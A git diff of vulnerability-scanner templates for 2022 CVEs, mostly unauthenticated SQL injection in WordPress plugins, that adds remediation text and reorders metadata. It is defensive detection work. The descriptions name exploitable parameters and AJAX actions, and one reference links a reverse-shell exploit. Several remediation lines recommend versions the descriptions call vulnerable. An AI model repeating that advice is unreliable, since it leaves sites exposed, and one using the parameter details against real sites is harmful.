b/http/cves/2022/CVE-2022-0692.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1. + remediation: | + Upgrade to version 3.0.1 or later to fix the open redirect vulnerability. reference: - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0692 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-0692 cwe-id: CWE-601 epss-score: 0.00133 - cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: alltube_project diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 8492801723..92d6328b43 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of WordPress Master Elements plugin (>=8.1) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/a72bf075-fd4b-4aa5-b4a4-5f62a0620643 - https://wordpress.org/plugins/master-elements @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0693 cwe-id: CWE-89 epss-score: 0.01196 - cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* epss-percentile: 0.83424 + cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: devbunch product: master_elements + framework: wordpress tags: unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index e2d925e747..be212e1c03 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE is susceptible to information disclosure. An attacker can access runner registration tokens using quick actions commands, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are from 12.10 before 14.6.5, from 14.7 before 14.7.4, and from 14.8 before 14.8.2. + remediation: | + Apply the necessary patches or updates provided by GitLab to fix the vulnerability. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-0735 cwe-id: CWE-863 epss-score: 0.02744 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* epss-percentile: 0.89212 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" vendor: gitlab product: gitlab + shodan-query: http.title:"GitLab" tags: cve,cve2022,gitlab http: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index b18b618fe2..4123edc774 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection. + remediation: Fixed in version 4.3.8 reference: - https://wpscan.com/vulnerability/a8575322-c2cf-486a-9c37-71a22167aac3 - https://wordpress.org/plugins/infographic-and-list-builder-ilist/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0747 - https://plugins.trac.wordpress.org/changeset/2684336 - remediation: Fixed in version 4.3.8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0747 cwe-id: CWE-89 epss-score: 0.011 - cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* epss-percentile: 0.82632 + cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: quantumcloud product: infographic_maker + framework: wordpress tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan http: diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 92f801bb28..b8940f94fd 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability. reference: - https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210 - https://wordpress.org/plugins/simple-link-directory/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-0760 cwe-id: CWE-89 epss-score: 0.011 - cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* epss-percentile: 0.82632 + cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: quantumcloud product: simple_link_directory + framework: wordpress tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan http: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 13457ff347..3b1954d1ed 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection. + remediation: | + Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/05eab45d-ebe9-440f-b9c3-73ec40ef1141 - https://wordpress.org/plugins/users-ultra/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0769 cwe-id: CWE-89 epss-score: 0.01196 - cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* epss-percentile: 0.83424 + cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: usersultra product: users_ultra + framework: wordpress tags: wp,users-ultra,wpscan,cve,cve2022,sqli,wordpress,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index e0909bbeb6..7061f1efa8 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users. + remediation: | + Update to Documentor version 1.5.3 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc - https://wordpress.org/plugins/documentor-lite/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0773 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: documentor_project product: documentor + framework: wordpress tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress http: diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 684aa7d044..3490241d59 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. + remediation: | + Upgrade to RevealJS postMessage version 4.3.0 or later to mitigate this vulnerability. reference: - https://hackerone.com/reports/691977 - https://github.com/hakimel/reveal.js/pull/3137 @@ -17,12 +19,12 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: - framework: node.js vendor: revealjs product: reveal.js + framework: node.js tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs headless: - steps: diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 94a215e90f..bb2f339f37 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Nirweb Support plugin (2.8.2 or higher) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161 - https://wordpress.org/plugins/nirweb-support/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0781 cwe-id: CWE-89 epss-score: 0.00974 - cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* epss-percentile: 0.81449 + cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: nirweb product: nirweb_support + framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 23529ec3f8..bb6398b08d 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of WordPress Title Experiments Free plugin (9.0.1 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f - https://wordpress.org/plugins/wp-experiments-free/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0784 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: title_experiments_free_project product: title_experiments_free + framework: wordpress tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress http: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index d5b4749746..26ab8912d7 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection. + remediation: | + Update to the latest version of the WordPress Daily Prayer Time plugin (2022.03.01) to fix the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255 - https://wordpress.org/plugins/daily-prayer-time-for-mosques/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0785 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: daily_prayer_time_project product: daily_prayer_time + framework: wordpress tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp http: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index ccd60d3676..1cf1a32d17 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the KiviCare plugin (2.3.9) or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30 - https://wordpress.org/plugins/kivicare-clinic-management-system/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0786 cwe-id: CWE-89 epss-score: 0.01851 - cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* epss-percentile: 0.8685 + cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: iqonic product: kivicare + framework: wordpress tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan http: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index f4bda69744..8f24319a60 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828 - https://wordpress.org/plugins/wp-fundraising-donation/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0788 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: wpmet product: wp_fundraising_donation_and_crowdfunding_platform + framework: wordpress tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan http: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 5e645496b8..71a3931987 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the BadgeOS plugin (>=3.7.1) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e - https://wordpress.org/plugins/badgeos/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0817 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: badgeos product: badgeos + framework: wordpress tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index e360594d7a..6824c4defe 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade Webmin to version 1.990 or later to mitigate this vulnerability. reference: - https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py - https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-0824 cwe-id: CWE-284,CWE-863 epss-score: 0.97243 - cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* epss-percentile: 0.99757 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: webmin diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index e163be81cc..76b3b0a8d3 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of WP Video Gallery plugin (>=1.7.2) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5 - https://wordpress.org/plugins/wp-video-gallery-free/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0826 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: wp-video-gallery-free_project product: wp-video-gallery-free + framework: wordpress tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth http: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 764ceb9e4f..3e227b750b 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to WordPress Best Books plugin version 2.6.3 or later to fix the SQL injection vulnerability. reference: - https://wpscan.com/vulnerability/0d208ebc-7805-457b-aa5f-ffd5adb2f3be - https://wordpress.org/plugins/bestbooks/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0827 cwe-id: CWE-89 epss-score: 0.01851 - cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* epss-percentile: 0.8685 + cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: presspage product: bestbooks + framework: wordpress tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated http: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 341df2de26..a66e61b458 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users. + remediation: Fixed in version 2.14.15.1 reference: - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4 - https://wordpress.org/plugins/speakout/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0846 - remediation: Fixed in version 2.14.15.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0846 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: speakout\!_email_petitions_project product: speakout\!_email_petitions + framework: wordpress tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2022,sqli,speakout,speakout-email-petitions http: diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index b29c5dbf42..419e25b6cf 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + remediation: | + Update UpdraftPlus plugin to version 1.22.9 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0864 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0864 cwe-id: CWE-79 epss-score: 0.00359 - cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* epss-percentile: 0.68676 + cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: 'updraftplus' product: 'updraftplus' + framework: wordpress tags: cve2022,xss,authenticated,updraftplus,wpscan,cve,wp-plugin,wp,wordpress http: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index c696eec7a9..113b66774b 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch. reference: - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494 - https://wordpress.org/plugins/arprice-responsive-pricing-table/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0867 cwe-id: CWE-89 epss-score: 0.04152 - cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9107 + cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: reputeinfosystems product: pricing_table + framework: wordpress tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve http: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 069c9c202c..2b214a1f50 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3. + remediation: | + Upgrade to a patched version of nitely/spirit to mitigate the open redirect vulnerability (CVE-2022-0869). reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0869 - https://huntr.dev/bounties/ed335a88-f68c-4e4d-ac85-f29a51b03342 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-0869 cwe-id: CWE-601 epss-score: 0.00153 - cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* epss-percentile: 0.50846 + cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: spirit-project diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index 6da70761f6..bb2b349f4e 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -6,22 +6,22 @@ info: severity: medium description: | Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 0.12.5. reference: - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 - remediation: Fixed in version 0.12.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 epss-score: 0.00218 - cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* epss-percentile: 0.59068 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: gogs product: gogs tags: cve,cve2022,ssrf,gogs,authenticated,huntr diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 8943389aa0..89eaa0e9f4 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Update to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df - https://wordpress.org/plugins/member-hero/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0885 cwe-id: CWE-862 epss-score: 0.13941 - cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94944 + cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: memberhero product: member_hero + framework: wordpress tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 1cd4c897ca..efc383351e 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax. + remediation: | + Upgrade Microweber to version 1.2.12 or later to mitigate this vulnerability. reference: - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-0928 cwe-id: CWE-79 epss-score: 0.00192 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.55945 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: microweber product: microweber 